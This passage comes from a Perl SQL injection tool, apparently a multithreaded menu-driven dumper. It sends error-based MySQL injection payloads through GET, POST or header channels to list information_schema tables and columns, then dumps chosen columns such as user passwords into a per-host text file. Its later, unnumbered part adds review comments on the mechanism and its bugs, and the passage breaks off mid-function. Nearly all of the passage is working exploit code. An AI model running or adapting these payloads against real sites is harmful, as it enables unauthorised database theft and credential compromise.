  4681.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(column_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus  . "where" . $f_plus . "table_name=" . $choice3 . $f_plus . "and" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4682.               $sql_header_query =~ s!\Q$search!$replacement!g;
  4683.               $content = scan_url_HEADER();
  4684.      }              
  4685.      $bd_num = $content;
  4686.      $bd_num =~ m/ussr(.*?)ussr/img;
  4687.      $bd_num = $1;
  4688.             $current="";
  4689.             $content="";
  4690.             $sql_post="";
  4691.             $sql_header_query="";
  4692.      print FILE "-----------------------------------------\n";
  4693.      print FILE "Columns in [$choice.$choice2]: $bd_num\n";
  4694.      print FILE "-----------------------------------------\n";
  4695.      print "-----------------------------------------\n";
  4696.      print "Columns in [$choice.$choice2]: $bd_num\n";
  4697.      print "-----------------------------------------\n";
  4698.      $num = -1; # ?? ????????
  4699.      $thr = $kol_threads; # ???-?? ???????
  4700.      print "Request method - $method\n";
  4701.      print "Threads - $kol_threads\n";
  4702.      print "Proxy - $proxy_message\n";
  4703.      print "----------------------\n";
  4704.      for(0..$thr) {
  4705.          $trl[$_] = threads->create(\&gets5050777);
  4706.      }
  4707.      for(0..$thr) {
  4708.          $trl[$_]->join;
  4709.      }
  4710.      sub gets5050777 {
  4711.        $| = 1;
  4712.        while ($num<$bd_num) {
  4713.          { lock($num);
  4714.          $num++; }
  4715.       if($sql_flag == 0){
  4716.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "column_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus  . "where" . $f_plus . "table_name=" . $choice3 . $f_plus . "and" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
  4717.               $content = scan_url();
  4718.       } elsif ($sql_flag == 1) {#POST
  4719.               $current = $f_url;
  4720.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "column_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus  . "where" . $f_plus . "table_name=" . $choice3 . $f_plus . "and" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
  4721.               $content = scan_url_POST();
  4722.       } elsif($sql_flag == 2){#HEADER
  4723.               $current = $f_url;
  4724.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "column_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus  . "where" . $f_plus . "table_name=" . $choice3 . $f_plus . "and" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
  4725.               $sql_header_query =~ s!\Q$search!$replacement!g;
  4726.               $content = scan_url_HEADER();
  4727.       }              
  4728.  
  4729.          if ($content =~ m/ussr(.*?)ussr/img) {
  4730.                   print $1 . "\n";
  4731.                   print FILE $1 . "\n";
  4732.          }
  4733.          print $num . "\r";
  4734.          sleep $pause;
  4735.             $current="";
  4736.             $content="";
  4737.             $sql_post="";
  4738.             $sql_header_query="";
  4739.  
  4740.        }
  4741.      }
  4742.     print "----------\n";
  4743.     print "Saved in " . "z_" . $host . ".txt\n";
  4744.     close(FILE);
  4745.     goto START2001;
  4746. } # end columns tables from tables from DB
  4747. if ($choice==5) {
  4748.      sub ascii_to_hex ($) {
  4749.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  4750.             $str = "0x" . $str;
  4751.             return $str;
  4752.      }
  4753.        open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  4754.      ## ???-?? ?????? ? information_schema.tables ##
  4755.       if($sql_flag == 0){
  4756.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4757.               $content = scan_url();
  4758.       } elsif ($sql_flag == 1) {#POST
  4759.               $current = $f_url;
  4760.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4761.               $content = scan_url_POST();
  4762.       } elsif($sql_flag == 2){#HEADER
  4763.               $current = $f_url;
  4764.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4765.               $sql_header_query =~ s!\Q$search!$replacement!g;
  4766.               $content = scan_url_HEADER();
  4767.       }                  
  4768.      $tab_num = $content;
  4769.      $tab_num =~ m/ussr(.*?)ussr/img;
  4770.      $tab_num = $1-1; # ???-?? ???????? ? informaion_schema
  4771.             $current="";
  4772.             $content="";
  4773.             $sql_post="";
  4774.             $sql_header_query="";
  4775.      print "-----------------------------------------\n";
  4776.      print "Tables in information_schema.tables - $1\n";
  4777.      print "-----------------------------------------\n";
  4778.      ## start from2 ##
  4779.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
  4780.      $choice = <STDIN>;
  4781.      chomp $choice;
  4782.      $thr = $kol_threads; # ???-?? ???????
  4783.      if ($choice == 1) {
  4784.           $num = -1; # ?? ????????
  4785.      } else {
  4786.           print "Enter START_position: ";
  4787.           $choice1 = <STDIN>;
  4788.           chomp $choice1;
  4789.           $num = $choice1-2;
  4790.           print "Enter END_position: ";
  4791.           $choice2 = <STDIN>;
  4792.           chomp $choice2;
  4793.           $tab_num = $choice2-1;
  4794.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
  4795.      }
  4796.      print "-----------------------------------------\n";
  4797.      ## end from2
  4798.      print FILE  "-----------------------------------------\n";
  4799.      print FILE  "Tables in information_schema.tables - $1\n";
  4800.      print FILE  "-----------------------------------------\n";
  4801.      print "Request method - $method\n";
  4802.      print "Threads - $kol_threads\n";
  4803.      print "Proxy - $proxy_message\n";
  4804.      print "----------------------\n";
  4805.      for(0..$thr) {
  4806.          $trl[$_] = threads->create(\&gets112);
  4807.      }
  4808.      for(0..$thr) {
  4809.          $trl[$_]->join;
  4810.      }
  4811.      sub gets112 {
  4812.        $| = 1;
  4813.        while ($num<$tab_num) {
  4814.          { lock($num);
  4815.          $num++; }
  4816.       if($sql_flag == 0){
  4817.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
  4818.               $content = scan_url();
  4819.       } elsif ($sql_flag == 1) {#POST
  4820.               $current = $f_url;
  4821.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
  4822.               $content = scan_url_POST();
  4823.       } elsif($sql_flag == 2){#HEADER
  4824.               $current = $f_url;
  4825.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
  4826.               $sql_header_query =~ s!\Q$search!$replacement!g;
  4827.               $content = scan_url_HEADER();
  4828.       }                            
  4829.         if ($content =~ m/ussr(.*?)ussr/img) {
  4830.                   print $1 . "\n";
  4831.                   print FILE $1 . "\n";
  4832.          }
  4833.          print $num . "\r";
  4834.          sleep $pause;
  4835.             $current="";
  4836.             $content="";
  4837.             $sql_post="";
  4838.             $sql_header_query="";
  4839.        }
  4840.      }
  4841.     print "----------\n";
  4842.     print "Saved in " . "z_" . $host . ".txt\n";
  4843.     close(FILE);
  4844.     goto START2001;
  4845. }#end 2
if ($choice==6) {
    # Menu item 6: list the columns of one table.
    #
    # Every request below uses the same error-based primitive: the injected
    # "(select count(0),concat((select ...),floor(rand(0)*2)) from <table>
    # group by 2 limit N,1)" makes MySQL raise a duplicate-entry error whose
    # message echoes the concat()'d value.  $sql_pref1/$sql_pref2 presumably
    # wrap that value in the 'ussr' markers that the m/ussr(.*?)ussr/
    # extraction looks for; $f_plus is the configured whitespace substitute,
    # $f_filtr the query suffix, $f_table the table the outer select runs
    # against, $ff_url/$f_url the injection point -- all set elsewhere.
    #
    # Steps: ask for a table name, resolve its schema and column count via
    # information_schema, then fan out worker threads that fetch one
    # column_name per LIMIT offset.  Output goes to the terminal and is
    # appended to z_<host>.txt, then control returns to the main menu.
    # NOTE(review): bareword FILE, 2-arg open, no error check, and $host is
    # used as-is in the file name (path characters are not filtered).
    open( FILE, ">>" . "z_" .$host . ".txt" ); # results file for this host (append)
    print "-----------------------------------------\n";
    print "Enter the table_name: ";
    $choice = <STDIN>;
    chomp $choice;
    # MySQL identifiers containing '-' must be backtick-quoted.
    if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
    print "Table: $choice\n";
    print "----------\n";
    print FILE  "-----------------------------------------\n";
    print FILE  "Table [ $choice ]\n";
    print FILE  "-----------------------------------------\n";
    # Hex literal (0x...) so the name can be compared without quotes.
    # NOTE(review): the backticks added just above are hex-encoded too, so a
    # name containing '-' will never match information_schema.tables.table_name.
    # ascii_to_hex is defined later in this file (inside the menu-7 block);
    # named subs exist at runtime regardless, but if it is not also declared
    # before this line, `ascii_to_hex $choice` may be parsed as an indirect
    # method call -- confirm against the top of the file.
    $choice1 = ascii_to_hex $choice;
    # Query 1: which schema holds the table.  $sql_flag selects the channel:
    # 0 = GET (query string), 1 = POST body, 2 = HTTP header.  The lookup is
    # not qualified by schema; if several schemas share the table name,
    # LIMIT 0,1 returns whichever comes first.
     if($sql_flag == 0){
              $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $content = scan_url();
      } elsif ($sql_flag == 1) {#POST: payload goes into $sql_post, $current is the plain URL
              $current = $f_url;
              $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $content = scan_url_POST();
      } elsif($sql_flag == 2){#HEADER: payload goes into $sql_header_query
              $current = $f_url;
              $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              # $search/$replacement: header-channel rewrite of the payload (set elsewhere).
              $sql_header_query =~ s!\Q$search!$replacement!g;
              $content = scan_url_HEADER();
      }
    $prefix = $content;
    $prefix =~ m/ussr(.*?)ussr/img;
    # NOTE(review): a failed match leaves $1 holding the previous successful
    # capture, so a missing marker silently reuses stale data here.
    $prefix = $1; # schema that holds the table
            # Reset per-request state before the next query.
            $current="";
            $content="";
            $sql_post="";
            $sql_header_query="";
    if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
    print "Database for $choice: $prefix\n";
    print FILE  "Database for $choice: $prefix\n";
    # Query 2: number of columns.  Again matched on table_name only, so the
    # count can include same-named tables from other schemas.
      if($sql_flag == 0){
              $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $content = scan_url();
      } elsif ($sql_flag == 1) {#POST
              $current = $f_url;
              $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $content = scan_url_POST();
      } elsif($sql_flag == 2){#HEADER
              $current = $f_url;
              $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $sql_header_query =~ s!\Q$search!$replacement!g;
              $content = scan_url_HEADER();
      }
    $colum_number = $content;
    $colum_number =~ m/ussr(.*?)ussr/img;
    $colum_number = $1; # column count for the table (same stale-$1 caveat as above)
            $current="";
            $content="";
            $sql_post="";
            $sql_header_query="";
    # schema.table, reused by menu item 7 as the "last parsed table".
    $full_table_name = $prefix . "." . $choice;
    print "Number of columns in " . $full_table_name . ": $colum_number\n";
    print FILE  "Number of columns in " . $full_table_name . ": $colum_number\n";
    print "----------\n";
    ## Column names: one LIMIT offset per worker iteration ##
    $thr = $kol_threads; # worker count (see the for(0..$thr) note below)
    $num = -1; # shared LIMIT offset; the first lock/++ makes it 0 -- do not change
    print "Request method - $method\n";
    print "Threads - $kol_threads\n";
    print "Proxy - $proxy_message\n";
    print "----------------------\n";
    print FILE  "Columns in " . $full_table_name . "\n";
    # 0..$thr is inclusive, so $kol_threads+1 workers are actually started
    # although "Threads - $kol_threads" was printed above.
    for(0..$thr) {
         $trl[$_] = threads->create(\&gets113111);
    }
    for(0..$thr) {
         $trl[$_]->join;
    }
    # Worker: claim the next offset under lock, fetch the column_name at
    # that offset, print it and append it to FILE.  Only $num is shared;
    # $current/$content/$sql_post/$sql_header_query are per-thread copies.
    # NOTE(review): the loop test reads $num outside the lock, so several
    # workers can pass it at once and the last few offsets may run past
    # $colum_number (extra requests that return nothing).  Lines written to
    # FILE by different workers may interleave.
    sub gets113111 {
       $| = 1; # autoflush so the "\r" progress counter updates in place
       while ($num<$colum_number) {
         { lock($num);
         $num++; }
      if($sql_flag == 0){
              $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "column_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
              $content = scan_url();
      } elsif ($sql_flag == 1) {#POST
              $current = $f_url;
              $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "column_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
              $content = scan_url_POST();
      } elsif($sql_flag == 2){#HEADER
              $current = $f_url;
              $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "column_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
              $sql_header_query =~ s!\Q$search!$replacement!g;
              $content = scan_url_HEADER();
      }
         # Only print when the marker pair was found in this response.
         if ($content =~ m/ussr(.*?)ussr/img) {
                  print "   " . $1 . "\n";
                  print FILE "  "  . $1 . "\n";
         }
         print $num . "\r";
         sleep $pause; # per-request delay (configured elsewhere)
            $current="";
            $content="";
            $sql_post="";
            $sql_header_query="";

       }
    }
    print FILE "----------\n";
    print "----------\n";
    print "Saved in " . "z_" . $host . ".txt\n";
    close(FILE);
    goto START2001; # back to the main menu (label defined earlier in the file)
}# end 3 -- menu item 6
if ($choice==7) {
    # Menu item 7: dump one or more columns of a table, optionally filtered
    # by a single "col=value" condition.  Uses the same error-based
    # (duplicate-entry) primitive and 'ussr' marker extraction as the other
    # menu items; see the variables $ff_url/$f_url/$f_plus/$f_filtr/
    # $sql_pref1/$sql_pref2/$search/$replacement, all set elsewhere.
    #
    # Hex-encode a string as a MySQL 0x... literal, one "%02lx" per char.
    # Named subs are compiled before runtime and are package-global, so
    # this is callable from the other menu blocks as well; the ($)
    # prototype gives it unary precedence so `ascii_to_hex $x` binds
    # tightly.  Characters above 0xff yield more than two hex digits.
    sub ascii_to_hex ($) {
               (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
               $str = "0x" . $str;
             return $str;
    }
    # NOTE(review): bareword FILE, 2-arg open, no error check; $host is used
    # unsanitised in the file name.
    open( FILE, ">>" . "z_" .$host . ".txt" ); # results file for this host (append)
    # $full_table_name (schema.table) is set by menu item 6 when it ran
    # earlier in this session; offer to reuse it.
    if ($full_table_name) {
       print "-----------------------------------------\n";
       print "Use last parsed table: $full_table_name ? (1/0): ";
       $choice = <STDIN>;
       chomp $choice;
       if ($choice==1) {
             $table_name = $full_table_name;
             print "Table: $table_name\n";
             print "----------\n";
       } else {
             print "-----------------------------------------\n";
             print "Enter the table_name: ";
             $choice = <STDIN>;
             chomp $choice;
             # '-' in an identifier needs backtick quoting.
             if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
             $table_name = $choice;
             print "-----------------------------------------\n";
             # information_schema only exists on MySQL >= 5; on older
             # servers the table is used unqualified.
             print "MySQL>=5 or MySql<5? (1/0): ";
             $choice = <STDIN>;
             chomp $choice;
             if ($choice == 1) {
                  # NOTE(review): backticks added above are hex-encoded too,
                  # so a '-' name will not match information_schema.
                  $choice1 = ascii_to_hex $table_name;
      # Resolve the schema by table_name only; with duplicates across
      # schemas LIMIT 0,1 picks the first.  $sql_flag: 0 GET, 1 POST, 2 header.
      if($sql_flag == 0){
              $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $content = scan_url();
      } elsif ($sql_flag == 1) {#POST
              $current = $f_url;
              $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $content = scan_url_POST();
      } elsif($sql_flag == 2){#HEADER
              $current = $f_url;
              $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $sql_header_query =~ s!\Q$search!$replacement!g;
              $content = scan_url_HEADER();
      }
                  $prefix = $content;
                  $prefix =~ m/ussr(.*?)ussr/img;
                  # NOTE(review): $1 keeps the previous capture if this
                  # match fails, so a missing marker yields stale data.
                  $prefix = $1; # schema that holds the table
            # Reset per-request state.
            $current="";
            $content="";
            $sql_post="";
            $sql_header_query="";
                  if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
                  $table_name = $prefix . "." . $table_name;
             }
             print "Table: $table_name\n";
             print "----------\n";
       }
    } else {
       # No table from menu item 6: same prompts as the branch above.
       print "-----------------------------------------\n";
       print "Enter the table_name: ";
       $choice = <STDIN>;
       chomp $choice;
       if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
       $table_name = $choice;
       print "-----------------------------------------\n";
       print "MySQL>=5 or MySql<5? (1/0): ";
       $choice = <STDIN>;
       chomp $choice;
       if ($choice == 1) {
                  $choice1 = ascii_to_hex $table_name;
       if($sql_flag == 0){
              $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $content = scan_url();
      } elsif ($sql_flag == 1) {#POST
              $current = $f_url;
              $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $content = scan_url_POST();
      } elsif($sql_flag == 2){#HEADER
              $current = $f_url;
              $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_schema" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_name=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $sql_header_query =~ s!\Q$search!$replacement!g;
              $content = scan_url_HEADER();
      }
                  $prefix = $content;
                  $prefix =~ m/ussr(.*?)ussr/img;
                  $prefix = $1; # schema that holds the table (stale-$1 caveat applies)
            $current="";
            $content="";
            $sql_post="";
            $sql_header_query="";
                  if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
                  $table_name = $prefix . "." . $table_name;
       }
       print "Table: $table_name\n";
       print "----------\n";
    }
    print "-----------------------------------------\n";
    # Comma-separated column list, inserted verbatim into concat_ws().
    print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
    $choice = <STDIN>;
    chomp $choice;
    $column_name = $choice;
    print FILE  "-----------------------------------------\n";
    print FILE  "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
    print FILE  "-----------------------------------------\n";
    print "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
    print "-----------------------------------------\n";
    print "Do you want add condition to sql-query?\n";
    print "----------\n";
    print "for example - where id=1 ? (1/0): ";
    $choice = <STDIN>;
    chomp $choice;
    if ($choice==1) {
        print "-----------------------------------------\n";
        print "Enter your condition here - only one condition, without 'where', '+' and quotes, example - id=1 :\n";
        print "----------\n";
        $choice = <STDIN>;
        chomp $choice;
        $where = $choice;
        # Split on '=' and hex-encode a non-numeric right-hand side so the
        # condition needs no quotes.  Only the first two pieces are kept;
        # a condition without '=' (LIKE, <, >, ...) leaves $whe undefined
        # and $where unchanged.
        ($con,$whe) = split(/=/,$where);
        if($whe =~ m/[^0-9]/img) {$where = $con . "=" . ascii_to_hex $whe}
        print "Your condition: [ where $where ]\n";
        $condition=1;
    } else {
        $condition=0;
    }
    if ($condition==0) {
         print "----------\n";
         ## Row count for the table (no condition) ##
         print "Count data from [ $table_name  ]\n";
      if($sql_flag == 0){
              $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $content = scan_url();
      } elsif ($sql_flag == 1) {#POST
              $current = $f_url;
              $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $content = scan_url_POST();
      } elsif($sql_flag == 2){#HEADER
              $current = $f_url;
              $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $f_plus . "from" . $f_plus . $table_name . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $table_name . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
              $sql_header_query =~ s!\Q$search!$replacement!g;
              $content = scan_url_HEADER();
      }
         $column_name_p = $content;
         $column_name_p =~ m/ussr(.*?)ussr/img;
         $column_name_p = $1; # row count; doubles as the loop bound below (stale-$1 caveat)
            $current="";
            $content="";
            $sql_post="";
            $sql_header_query="";
         print "$column_name_p\n";
         print "----------\n";
         ## Choose full dump or a 1-based record range ##
         print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
         $choice = <STDIN>;
         chomp $choice;
         $thr = $kol_threads; # worker count ($kol_threads+1 are started, 0..$thr is inclusive)
         if ($choice == 1) {
